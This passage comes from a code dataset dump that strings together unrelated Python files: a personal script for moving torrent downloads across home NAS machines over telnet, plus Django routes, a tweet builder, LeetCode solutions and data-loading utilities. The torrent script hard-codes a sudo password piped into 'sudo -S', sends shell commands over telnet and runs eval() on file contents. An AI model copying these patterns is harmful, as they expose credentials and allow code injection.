'/home/yc/a4d/':\n return 'a4', '/home/yc/dn/' + fn[13:]\n if fn == '/aa' or fn.startswith('/aa/'):\n return 'a4', fn\n if fn == '/home/yc/dn' or fn.startswith('/home/yc/dn/'):\n return 'a4', fn\n return 'a3', fn\n\n\ndef sudo_python(text, pfn):\n srv, lfn = get_local_name(pfn)\n with open(pfn, 'w', encoding='utf8') as f:\n f.write(text)\n telnet.telnet_nas(srv, 'echo \"1234\" | sudo -S python3 {}'.format(lfn))\n\n\ndef lock(fn):\n print('', fn)\n srv, _ = get_local_name(fn)\n if srv == 'a1':\n telnet.py(srv, 'import fsys\\nfsys.deepRemoveWrite({})', fn)\n else:\n telnet.sudoPy(srv, 'import fsys\\nfsys.deepAddImmu({})', fn)\n\n\ndef unlock(fn):\n print('', fn)\n srv, _ = get_local_name(fn)\n if srv == 'a1':\n telnet.py(srv, 'import fsys\\nfsys.deepAddWrite({})', fn)\n else:\n telnet.sudoPy(srv, 'import fsys\\nfsys.deepRemoveImmu({})', fn)\n\n\ndef move_to_top(fn):\n n = os.path.basename(fn)\n for x in ['/b6/','/b7/','/b8/','/b9/',\n '/home/yc/a4a/','/home/yc/a4d/',\n '/a3/','/b1/','/b5/',\n '/']:\n if fn.startswith(x):\n newfn = x + n\n os.rename(fn, newfn)\n return newfn \n\n\ndef print_disk_size():\n print('dn1-{} a3-{} b1-{} b2-{} 4a-{} 4b-{} 4d-{}'.format(\n fsys.get_disk_free_space('/home/yc/dn1'),\n fsys.get_disk_free_space('/a3'),\n fsys.get_disk_free_space('/b1'),\n fsys.get_disk_free_space('/b2'),\n fsys.get_disk_free_space('/aa'),\n fsys.get_disk_free_space('/a4b'),\n fsys.get_disk_free_space('/home/yc/dn'),\n ))\n\n\ndef web_download(url):\n t = time.localtime()\n prefix = '{:02d}{:02d}{:02d}'.format(t.tm_hour, t.tm_min, t.tm_sec)\n if subprocess.call(['webber', url, prefix]) != 0:\n raise Exception('error')\n \n dfn = '/home/yc/temp/' + prefix + '.down'\n pfn = '/home/yc/temp/' + prefix + '.page'\n \n if not os.path.isfile(dfn): dfn = None\n if not os.path.isfile(pfn): pfn = None\n return dfn, pfn\n\n\ndef web_download_page(url):\n dfn, pfn = web_download(url)\n if dfn:\n fsys.remove(dfn)\n fsys.remove(pfn)\n raise Exception('error')\n\n html = open(pfn).read()\n fsys.remove(pfn)\n return html\n\n\ndef get_ttg_torrent_url(idx):\n html = web_download_page('https://totheglory.im/details.php?id={}'.format(idx))\n i = html.find('download.php')\n if i < 0: raise Exception('No link in html')\n j = html.find('\"', i)\n if j < 0: raise Exception('No link in html')\n link = 'https://totheglory.im/' + html[i:j-1]\n return link\n\n\ndef download_torrent_file(value):\n if value[-1:] == '.': value = value[:-1]\n if value[0] == 'o':\n url = 'https://open.cd/download.php?id={}'.format(value[1:])\n elif value[0] == 't':\n url = get_ttg_torrent_url(value[1:])\n elif value[0] == 'm':\n url = 'https://tp.m-team.cc/download.php?id={}'.format(value[1:])\n elif value[0] == 'h':\n url = 'https://hdchina.club/download.php?id={}'.format(value[1:])\n else:\n raise Exception('error')\n\n dfn, pfn = web_download(url)\n if not dfn:\n fsys.remove(pfn)\n raise Exception('error')\n\n return dfn\n\n\ndef keep_young_torrent_file(folder, prefix, keep_count):\n a = []\n for x in os.listdir(folder):\n if not x.startswith(prefix): continue\n st = os.stat(os.path.join(folder, x))\n a.append((x, st.st_atime))\n if len(a) > keep_count:\n a.sort(key=lambda x:x[1])\n for i in range(len(a)-keep_count):\n fn = os.path.join(folder, a[i][0])\n fsys.remove(fn)\n\n\ndef get_torrent_file(value):\n # convert argument\n if value[-1:] == '.': value = value[:-1]\n \n # already in Downloads\n dndir = os.path.join(os.environ['HOME'], 'torrent')\n tfn = os.path.join(dndir, value+'.torrent')\n if os.path.isfile(tfn):\n return tfn\n\n 
tfn1 = os.path.join(os.environ['HOME'], 'Downloads', value+'.torrent')\n if os.path.isfile(tfn1):\n fsys.copy(tfn1, tfn, prompt=False)\n return tfn\n\n dfn = download_torrent_file(value)\n shutil.copy(dfn, tfn)\n keep_young_torrent_file(dndir, value[0], 100)\n return tfn\n\n\ndef mount_a4():\n def is_mount(d):\n subprocess.call(['ls', '/home/yc/a4d'],\n stdout=subprocess.PIPE)\n o = subprocess.check_output(['df', '-h', d])\n return o.find(b'192.168.1.156') >= 0\n \n def mount(d):\n if is_mount(d): return True\n subprocess.call(['mount', d])\n return is_mount(d)\n\n if not mount('/home/yc/a4a') or not mount('/home/yc/a4d'):\n return False\n return True\n\n\ndef check_download_a4(tfn, ddir):\n assert isA4Mounted(), 'A4 is not mounted'\n\n # copy torrent file to share folder\n tfn_rm = '/home/yc/dn1/' + os.path.basename(tfn)\n if os.path.isfile(tfn_rm): os.remove(tfn_rm)\n shutil.copyfile(tfn, tfn_rm)\n\n telnet.py('a4',\n 'import torrentcheck\\ntorrentcheck.do_check([{},{}])',\n tfn_rm, ddir)\n \n os.remove(tfn_rm)\n '''\n # copy torrent file to share folder\n tfn_rm = '/home/yc/dn1/' + os.path.basename(tfn)\n if os.path.isfile(tfn_rm): os.remove(tfn_rm)\n shutil.copyfile(tfn, tfn_rm)\n \n # remove check.result\n rfn = '/home/yc/dn1/check.result'\n if os.path.isfile(rfn): os.remove(rfn)\n\n # telnet\n name = os.path.basename(ddir)\n prefix = name[:name.find('.')]\n pdir = os.path.dirname(ddir)\n cmd = ['cd /home/yc/dn',\n 'python3 front.py check \"{}\" \"{}\" {}'.format(tfn_rm, pdir, prefix)]\n telnet.telnet_nas('a4', cmd)\n\n os.remove(tfn_rm)\n\n # check result\n if not os.path.isfile(rfn):\n raise Exception('Check fail. No {}'.format(rfn))\n if open(rfn).read() != '0':\n raise Exception('Check fail. Not 0 result.')\n '''\n\n\ndef check_download(tfn, ddir):\n srv, _ = get_local_name(ddir)\n if srv == 'a3':\n torrentcheck.do_check([tfn, ddir, 2])\n elif srv == 'a4':\n check_download_a4(tfn, ddir)\n else:\n torrentcheck.do_check([tfn, ddir, 2])\n\n\ndef isA4Mounted():\n if subprocess.call(['ping', '-c', '1', '192.168.1.156']) != 0:\n return False\n if os.path.isdir('/aa/blue') and os.path.isdir('/aa/pc'):\n return True\n else:\n return False\n\n\ndef copyInA4(src, dst):\n assert isA4Mounted(), 'a4 is not mounted or power on'\n \n if fsys.get_disk_free_space('/aa') < 50:\n raise Exception('Free space is low') \n\n telnet.py('a4',\n 'import fsys\\nfsys.lcpto({},{},3)',\n src, dst)\n\n\ndef move_one(value, folder, remove_src = True):\n # in TM?\n t = tm.find(value)\n if not t: raise Exception('Not in TM {}'.format(value))\n if t.progress != 100: raise Exception('Progress {} {}'.format(t.progress, value))\n\n # trim folder name\n if folder[-1] == '/': folder = folder[:-1]\n\n # copy to same folder?\n sour = t.downloadDir\n if sour[-1] == '/': sour = sour[:-1]\n if sour == folder: raise Exception('sour same as dest')\n sour = sour + '/' + t.name\n\n # get torrent file\n tfn = get_torrent_file(value)\n\n # copy\n if not isA4Mounted() or \\\n get_local_name(sour)[0] == 'a3' and get_local_name(folder)[0] == 'a3':\n if gui_copy.work(['-co','-end','-d10', sour, folder]) != 0: return\n else:\n copyInA4(sour, folder)\n\n # lock dest\n dest = os.path.join(folder, t.name)\n if not folder.startswith('/home/yc/a4d'):\n lock(dest)\n\n # verify\n time0 = time.time()\n check_download(tfn, dest)\n second = int(time.time() - time0)\n subprocess.call(['du','-sh', dest], stdout=sys.stdout)\n print('{0[0]}m {0[1]}s'.format(divmod(second,60)))\n\n # stop torrent, relocate and start\n tm.setup_transmission_client()\n 
tm.stop_torrent(t.hashString)\n if folder.startswith('/home/yc/a4d'):\n tm.remove_torrent(t.hashString)\n else:\n time.sleep(5)\n tm.locate_torrent_data(t.hashString, location = folder)\n if get_local_name(folder)[0] != 'a4':\n print('start torrent')\n tm.start_torrent(t.hashString)\n\n # update cache\n if folder in ['/aa/blue', '/aa/xyz/game', '/aa/pc', '/aa/ps3', '/aa/doc']:\n cfn = '/home/yc/temp/down-cache'\n l = eval(open(cfn, encoding='utf8').read())\n l.append(value)\n open(cfn, 'w', encoding='utf8').write(repr(l))\n\n if dest[3:7] == '/4d/':\n copyInA4(dest, '/home/yc/dn/xx')\n lock(os.path.join('/home/yc/dn/xx', t.name))\n if dest[3:7] == '/4a/':\n copyInA4(dest, '/aa/blue/xx')\n lock(os.path.join('/aa/blue/xx', t.name))\n if dest[3:7] == '/4b/':\n copyInA4(dest, '/a4b/xx')\n lock(os.path.join('/a4b/xx', t.name))\n if dest[3:7] in ['/b6/','/b7/','/b8/','/b9/']:\n copyInA4(dest, dest[3:7]+'xx')\n lock(os.path.join(dest[3:7]+'xx', t.name))\n \n if remove_src:\n unlock(sour)\n fsys.remove(sour)\n\n\ndef do_move(argv):\n folder = argv[0]\n if not folder.startswith('/'):\n folder = '/aa/' + folder\n for x in argv[1:]:\n move_one(x, folder)\n\n\ndef do_gog_copy(argv):\n d_done_fn = '/home/yc/temp1/t324978.done'\n d_done = {}\n if os.path.isfile(d_done_fn):\n d_done = eval(open(d_done_fn, 'r', encoding='utf8').read())\n\n def the_filter(ps):\n r = not d_done.get(ps['name'])\n return r\n\n for x in torrent.enum_other_done_file('t324978', 't324338', the_filter):\n print(x['src'])\n print(x['dst'])\n input('copy...')\n\n fsys.copy(x['src'], x['dst'])\n d_done[x['src_name']] = True\n open(d_done_fn, 'w', encoding='utf8').write(repr(d_done))\n\n\ndef do_dup(argv):\n v = argv[0]\n t = tm.find(v)\n if not t: raise Exception('error')\n if t.downloadDir != '/b9' and t.downloadDir != '/b9/': raise Exception('error')\n \n print(t.name)\n telnet.telnet_nas('a4', 'fcp \"/b9/{}\" ~/dn/b9'.format(t.name))\n \n tmc = tm.setup_transmission_client()\n print(\"stop...\")\n tmc.stop_torrent(t.hashString)\n \n telnet.telnet_nas('a1',\n ['chmod -R +w \"/share/b4/{}\"'.format(t.name),\n 'mv \"/share/b4/{}\" /share/b4/4d'.format(t.name),\n 'chmod -R -w \"/share/b4/4d/{}\"'.format(t.name)\n ])\n \n print(\"relocate...\")\n tmc.locate_torrent_data(t.hashString, location='/b9/4d')\n print(\"start...\")\n tmc.start_torrent(t.hashString)\n\n\ndef do_test1(argv):\n for src, dst in torrent.get_local_exist_file('/b8/t324338.torrent',\n '/home/yc/a4a/pc/t33232.GoG',\n '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'):\n print(src)\n print(dst)\n input('copy...')\n telnet.telnet_nas('a4',\n ['rm \"{}\"'.format(dst),\n 'python3 /home/yc/dn/mypy/fsys.py copy_file \"{}\" \"{}\"'.format(\n src.replace('/home/yc/a4a/', '/aa/'),\n dst\n )\n ])\n\n\nclass DiffSzCopy:\n def __init__(self, src_dir, src_ns, dst_dir, dst_ns, offset):\n self.src_dir = src_dir\n self.src_ns = src_ns\n self.dst_dir = dst_dir\n self.dst_ns = dst_ns\n self.offset = offset\n \n def read(self, sz):\n b = b''\n while sz:\n if self.src_idx >= len(self.src_ns):\n b += b'\\x00' * sz\n break\n \n if self.src_f == 0:\n n = self.src_ns[self.src_idx]['name']\n fn = os.path.join(self.src_dir, n)\n self.src_f = open(fn, 'rb')\n self.src_offset = 0\n\n fsz = self.src_ns[self.src_idx]['size']\n readsz = min(sz, fsz - self.src_offset)\n b += self.src_f.read(readsz)\n self.src_offset += readsz\n sz -= readsz\n \n if self.src_offset == fsz:\n self.src_f.close()\n self.src_f = 0\n self.src_idx += 1\n\n return b\n\n def 
write(self, buf):\n bufOffset = 0\n while bufOffset < len(buf):\n if self.dst_f == 0:\n n = self.dst_ns[self.dst_idx]['name']\n fn = os.path.join(self.dst_dir, n)\n fsys.mkdir(os.path.dirname(fn))\n self.dst_f = open(fn, 'wb')\n self.dst_offset = 0\n \n fileSz = self.dst_ns[self.dst_idx]['size']\n writeSz = min(len(buf)-bufOffset, fileSz-self.dst_offset)\n self.dst_f.write(buf[bufOffset:bufOffset+writeSz])\n bufOffset += writeSz\n self.dst_offset += writeSz\n \n if self.dst_offset == fileSz:\n self.dst_f.close()\n self.dst_f = 0\n self.dst_idx += 1\n \n def copy(self):\n print('offset', self.offset)\n self.src_f = self.src_idx = self.src_offset = 0\n self.dst_f = self.dst_idx = self.dst_offset = 0\n sz = sum([x['size'] for x in self.dst_ns])\n \n offset = self.offset\n while offset > 0:\n runsz = min(offset, 128*1024)\n self.read(runsz)\n offset -= runsz \n \n print('{:06,}'.format(sz//fsys.MB), end='', flush=True)\n while sz:\n runsz = min(128*1024, sz)\n t1 = time.time()\n b = self.read(runsz)\n self.write(b)\n t2 = time.time()\n sz -= runsz\n print('\\b'*6+'{:06,}'.format(sz//fsys.MB), end='', flush=True)\n time.sleep(2*(t2-t1))\n print('')\n \n\n\ndef do_test2(argv):\n import transmissionrpc\n d1 = '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'\n p1 = 't324338'\n d2 = '/home/yc/dn/t312487.GOG Collection part 7 (U-Z)'\n p2 = 't312487'\n p3 = None\n '''\n p3 = 't'\n '''\n \n ns1 = torrent.get_name_size('/b8/'+p1+'.torrent')\n ns2 = torrent.get_name_size('/b8/'+p2+'.torrent')\n\n def has_key(x, key):\n return x['name'].lower().find(key.lower()) >= 0\n \n def has_keys(x, keys):\n return all([has_key(x, k) for k in keys])\n\n def get_next(tmc, t, prefix):\n fn = '/home/yc/temp1/'+p2+'.key'\n files = t.files()\n if os.path.isfile(fn):\n i = int(open(fn, 'r', encoding='utf8').read())\n else:\n i = -1\n print(i)\n while True:\n i += 1\n if i >= len(files): return None\n f = files[i]\n n = f['name']\n print('<{}/() {}>'.format(i, len(files), n))\n if n.endswith('.exe') or n.endswith('.bin'):\n break\n bn = os.path.basename(n)\n open(fn, 'w', encoding='utf8').write(str(i))\n return bn\n\n def isComplete(t, l):\n ll = [x for x in l]\n files = t.files()\n for x in files.values():\n n = x['name']\n n = n[n.find('/')+1:]\n for y in ll:\n if n == y['name']:\n if x['completed'] != x['size']:\n print(x)\n return False\n ll.remove(y)\n break\n if len(ll) == 0: return True\n print(ll)\n raise Exception('error')\n\n def copy(src, ddir, delay):\n bn = os.path.basename(src)\n dst = os.path.join(ddir, bn)\n for x in fsys.get_sub_name(src):\n s = os.path.join(src, x)\n d = os.path.join(dst, x)\n fsys.remove(d)\n fsys.copy(s, d, prompt=True, delay=delay)\n\n tm.setup_transmission_client()\n t1 = tm.find(p1)\n if p3: t3 = tm.find(p3)\n\n tmc = transmissionrpc.Client(address='192.168.1.156')\n t2 = tmc.get_torrents()[0]\n \n if t2.downloadDir != '/home/yc/dn':\n tmc.locate_torrent_data(t2.hashString, location = '/home/yc/dn')\n \n for _ in range(30):\n if len(argv) == 0:\n key = get_next(tmc, t2, p2)\n else:\n key = argv[0]\n fn = '/home/yc/temp1/'+p2+'.key'\n open(fn, 'w', encoding='utf8').write(key)\n argv = []\n if not key:\n print('Finished...')\n break\n \n if key.endswith('.bin'):\n keys = [key[:-5], key[-4:]]\n else:\n keys = [key]\n \n l2 = [x for x in ns2 if has_keys(x, keys)]\n l2.sort(key=lambda x : x['name'])\n l1 = [x for x in ns1 if has_keys(x, keys)]\n l1.sort(key=lambda x : x['name'])\n if not isComplete(t1, l1): raise Exception('Not 
complete')\n \n for x in l1: print(x['name'])\n print('')\n for x in l2: print(x['name'], '*' if x['name'].endswith(key) else '')\n \n if len(l1) != len(l2): continue\n \n src_sz = sum([x['size'] for x in l1])\n dst_sz = sum([x['size'] for x in l2])\n print('sz {:,} {:,} {:,}'.format(src_sz, dst_sz, src_sz-dst_sz))\n \n if len(l1)>1 and input('chk?...') != '': continue\n \n offset = 0\n if argv[1:] and argv[1] == 'offset':\n if src_sz > dst_sz:\n offset = src_sz - dst_sz\n \n c = DiffSzCopy(d1, l1, d2, l2, offset)\n c.copy()\n \n tmc.verify_torrent(t2.hashString)\n while True:\n t2.update()\n progress = int(t2.recheckProgress * 100)\n print('\\b\\b\\b{}'.format(progress), end='', flush=True)\n if t2.status != 'checking': break\n time.sleep(8)\n print('')\n \n bHasData = False\n for x in t2.files().values():\n for y in l2:\n if x['name'].find(y['name']) >= 0:\n if x['completed'] != 0: bHasData = True\n print(x['completed']*100//x['size'],\n y['name'])\n \n if bHasData:\n copy(d2, '/home/yc/dn1', 3)\n #fsys.lcpto(d2, '/home/yc/dn1', 3)\n fsys.remove(d2)\n print('\\n')\n\n\ndef do_link_gog(argv):\n d1 = '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'\n d2 = '/b1/t324974.GOG Collection part 4 (M-R)'\n pre1 = re.search('t[0-9]*', d1).group(0)\n pre2 = re.search('t[0-9]*', d2).group(0)\n tm.setup_transmission_client()\n t1 = tm.find(pre1)\n files1 = t1.files()\n t2 = tm.find(pre2)\n\n startIdx = 0\n if argv[0:1]: startIdx = int(argv[0])\n\n def _get_path(x):\n n = x['name']\n n = n[n.find('/')+1:]\n return n\n\n def _get_lowername(x):\n n = os.path.basename(x['name'])\n n = n.lower()\n return n\n\n def _find_match(x, files, t):\n ln1 = _get_lowername(x)\n for x2 in files.values():\n ln2 = _get_lowername(x2)\n if ln1 == ln2:\n if x2['completed'] != x2['size']:\n msg = 'Not completed ' + x2['name']\n tm.enableDownload(t, x2['name'])\n raise Exception(msg)\n if x['size'] == x2['size']:\n return x2\n \n for idx, x2 in enumerate(t2.files().values()):\n if idx < startIdx: continue\n x1 = _find_match(x2, files1, t1)\n if x1 == None: continue\n print(idx, x2['name'])\n print('---', x1['name'])\n fn1 = os.path.join(d1, _get_path(x1))\n fn2 = os.path.join(d2, _get_path(x2))\n py = '''\nimport fsys, os, subprocess\ndef func():\n fn1 = '{}'\n fn2 = '{}'\n print('check link')\n if os.path.islink(fn1): return\n print('cmp', '{}'.format(os.stat(fn1).st_size))\n if fsys.cmp_file(fn1, fn2) != 'same': return\n print('same')\n os.remove(fn1)\n os.symlink(fn2, fn1)\n\nfunc()\n'''\n py = py.format(fn1.replace(\"'\",\"\\\\'\"),\n fn2.replace(\"'\",\"\\\\'\"),\n '{:,}')\n open('/b6/mypy/test.py', 'wt', encoding='utf8').write(py)\n telnet.telnet_nas('a1',\n ['python3 /b6/mypy/test.py',\n 'if [ \"$?\" != \"0\" ]; then sleep 10000; fi'\n ])\n print('=========================')\n time.sleep(2)\n\n\ndef do_asstr(argv):\n n = 'Year2017'\n url = 'http://www.asstr.org/files/Collections/Alt.Sex.Stories.Moderated/'+n\n htmlFn = '/home/yc/'+n\n if not os.path.isfile(htmlFn):\n os.chdir(os.path.dirname(htmlFn))\n assert subprocess.call(['wget', url]) == 0\n html = open('/home/yc/'+n).read()\n d = '/home/yc/temp/'+n\n fsys.mkdir(d)\n os.chdir(d)\n i = html.find('Parent Directory')\n assert i >= 0\n while True:\n i = html.find('[\\w\\-]+)', views.records, name='Records'),\n path('records/', views.records, name='Records'),\n path('schedule/', views.schedule, name='Schedule'),\n path('FAQ/', views.FAQs, name='FAQ'),\n url(r'^news/(?P[0-9]+)/(?P[0-9]+)', views.news, name='News'),\n 
url(r'^news/(?P<id>[0-9]+)/', views.news, name='News'),\n path('news/', views.news, name='News'),\n path('exec/',views.Exec, name='Exec'),\n path('routes/',views.Routes, name='Routes'),\n]\n","sub_path":"RunningClubSite/Main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155239116","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015 Carl Chenet \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n\n# Build the tweet to send\n'''Build the tweet to send'''\n\nclass TwBuild(object):\n '''TwBuild class'''\n def __init__(self, cfgvalues, dbvalues):\n '''Constructor for the TwBuild class'''\n self.cfgvalues = cfgvalues\n self.dbvalues = dbvalues\n self.tweets = []\n self.main()\n\n def main(self):\n '''main of TwBuild class'''\n # get hashtags\n if self.cfgvalues['hashtags'] != '':\n hashtags = self.cfgvalues['hashtags'].split(',')\n hashtags = [i for i in hashtags if i != '']\n for i in self.dbvalues:\n j = self.cfgvalues['tweet'].format(*i)\n # identify and replace hashtags\n j = j.lower()\n for hashtag in hashtags:\n pattern = ' ' + hashtag\n if pattern in j.lower():\n j = j.replace(pattern, ' #{}'.format(hashtag))\n # uppercase for the first letter of the tweet\n if self.cfgvalues['upper_first_char']:\n j = j[0].upper() + j[1:]\n self.tweets.append(j)\n\n @property\n def readytotweet(self):\n '''return the tweet ready to be sent'''\n return self.tweets\n","sub_path":"db2twitter/twbuild.py","file_name":"twbuild.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2353900","text":"'''\n19. 
Remove Nth Node From End of List\n\n\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n\n\n'''\n\n\n\n# not my idea\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(None)\n dummy.next = head\n first = dummy\n second = dummy\n i=1\n while i < n+2:\n first = first.next\n i += 1\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n\n\n# 2020/05/22, two pointer\n\n'''\nRuntime: 60 ms, faster than 5.69% of Python3 online submissions for Remove Nth Node From End of List.\nMemory Usage: 13.7 MB, less than 6.06% of Python3 online submissions for Remove Nth Node From End of List.\n'''\n\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n fast = slow = dummy\n for i in range(n):\n fast = fast.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next\n node = slow.next\n slow.next = node.next\n return dummy.next","sub_path":"0019. Remove Nth Node From End of List.py","file_name":"0019. Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"200190563","text":"from openpyxl import Workbook\nimport os\nfrom tkinter import *\n\nclass XLSync:\n def __init__(self, path, name):\n print(\"Initializing object\")\n self.path = path\n self.name = name\n\n def execute(self):\n wb = Workbook()\n print(\"Workbook created\")\n ws = wb.active\n print(\"Workbook activated\")\n count = 0\n dir_count = 0\n for dir, subdir, file in os.walk(self.path):\n index=0\n dir_count += 1\n while index < len(file):\n ws.cell(row=count+1, column = 1, value=file[index])\n count+=1\n index+=1\n print(\"directory {0} uploaded\".format(dir_count))\n\n wb.save(\"{0}.xlsx\".format(self.name))\n print(\"excel file saved\")\n\n#create window\nwindow = Tk()\n#First input\nframe1=Frame()\nframe1.pack(fill= X)\n\npath_label= Label(frame1, text= \"File Path\", width=6)\npath_label.pack(side = LEFT, padx = 5, pady= 5)\n\nentry1 = Entry(frame1)\nentry1.pack(fill=X, padx=5, expand=True)\n\n#Second Entry\nframe2 = Frame()\nframe2.pack(fill=X)\n\nname_file = Label(frame2, text= \"File Name\", width = 10)\nname_file.pack(side=LEFT, padx= 5, pady=5)\n\nentry2 = Entry(frame2)\nentry2.pack(fill=X, padx=5, expand=True)\n\ndef print_text():\n path = entry1.get()\n name = entry2.get()\n return path, name\n\ndef close_window():\n window.destroy()\n\ndef combine_functions():\n path, name = print_text()\n print(\"Path received: {0}\".format(path))\n print(\"File name received: {0}\".format(name))\n XLSync(path, name).execute()\n close_window()\n\n#enter button\nenter_button = Button(window, text=\"Enter\", command=combine_functions)\nenter_button.pack(side=RIGHT)\n\nwindow.mainloop()\n","sub_path":"XL_Sync.py","file_name":"XL_Sync.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"35463512","text":"#字典\n#1. 创建字典{}\n#2. dict()转换为字典\nlol=[['a','b'],['c','d']]\ndict(lol)\n#3. [key]添加修改元素\n#4. update()合并字典\n#5. del删除具有指定key的元素\n#6. clear()删除所有元素\n#7. in\n#8. 获取元素[key]或get()\n#9. keys()获取所有键\n#10. values()获取所有值\n#11. items()\n#12. copy()复制\n","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226617477","text":"import pandas as pd\nimport numpy as np\nimport random\nimport logging\nimport cv2\nimport sys\nfrom DataManipulator import DataManipulator\nsys.path.append(\"../DataProcessing/\")\nfrom ImageTransformer import ImageTransformer\n\nclass DataProcessor:\n\n @staticmethod\n def ProcessTrainData(trainPath, isExtended=False):\n \"\"\"Reads the .pickle file and converts it into a format suitable fot training\n\n Parameters\n ----------\n trainPath : str\n The file location of the .pickl\n isExtended : bool, optional\n True if the dataset contains both head and hand pose and you wish to retrieve both\n\n\n Returns\n -------\n list\n list of video frames and list of labels (poses)\n \"\"\"\n train_set = pd.read_pickle(trainPath)\n\n logging.info('[DataProcessor] train shape: ' + str(train_set.shape))\n size = train_set.shape[0]\n n_val = int(float(size) * 0.2)\n #n_val = 13000\n\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(train_set)\n\n np.random.seed(1749)\n random.seed(1749)\n # split between train and test sets:\n x_train = train_set['x'].values\n x_train = np.vstack(x_train[:]).astype(np.float32)\n x_train = np.reshape(x_train, (-1, h, w, c))\n\n x_train= np.swapaxes(x_train, 1, 3)\n x_train = np.swapaxes(x_train, 2, 3)\n\n y_train = train_set['y'].values\n y_train = np.vstack(y_train[:]).astype(np.float32)\n\n ix_val, ix_tr = np.split(np.random.permutation(train_set.shape[0]), [n_val])\n x_validation = x_train[ix_val, :]\n x_train = x_train[ix_tr, :]\n y_validation = y_train[ix_val, :]\n y_train = y_train[ix_tr, :]\n\n shape_ = len(x_train)\n\n sel_idx = random.sample(range(0, shape_), k=(size-n_val))\n #sel_idx = random.sample(range(0, shape_), k=50000)\n x_train = x_train[sel_idx, :]\n y_train = y_train[sel_idx, :]\n\n\n\n if isExtended == True:\n z_train = train_set['z'].values\n z_train = np.vstack(z_train[:]).astype(np.float32)\n z_validation = z_train[ix_val, :]\n z_train = z_train[ix_tr, :]\n z_train = z_train[sel_idx, :]\n return [x_train, x_validation, y_train, y_validation, z_train, z_validation]\n\n return [x_train, x_validation, y_train, y_validation]\n\n @staticmethod\n def ProcessTestData(testPath, isExtended=False):\n \"\"\"Reads the .pickle file and converts it into a format suitable fot testing\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n isExtended : bool, optional\n True if the dataset contains both head and hand pose and you wish to retrieve both\n\n\n Returns\n -------\n list\n list of video frames and list of labels (poses)\n \"\"\"\n\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(test_set)\n\n x_test = test_set['x'].values\n x_test = np.vstack(x_test[:]).astype(np.float32)\n x_test = np.reshape(x_test, (-1, h, w, c))\n\n\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = test_set['y'].values\n y_test = np.vstack(y_test[:]).astype(np.float32)\n\n if isExtended ==True:\n z_test = test_set['z'].values\n z_test = 
np.vstack(z_test[:]).astype(np.float32)\n return [x_test, y_test, z_test]\n\n\n return [x_test, y_test]\n\n @staticmethod\n def GetTimeStampsFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the frames' timestamps\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of timestamps\n \"\"\"\n\n t_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 't' in test_set.columns:\n t_test = test_set['t'].values\n\n\n return t_test\n\n @staticmethod\n def GetOutputsFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the recorded NNs outputs\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of outputs/predictions\n \"\"\"\n\n o_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'o' in test_set.columns:\n o_test = test_set['o'].values\n o_test = np.vstack(o_test[:]).astype(np.float32)\n\n return o_test\n\n @staticmethod\n def GetPitchFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the pitch values\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of pitch values\n \"\"\"\n\n p_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'p' in test_set.columns:\n p_test = test_set['p'].values\n\n return p_test\n\n @staticmethod\n def GetRollFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the roll values\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of roll values\n \"\"\"\n\n r_test = None\n test_set = 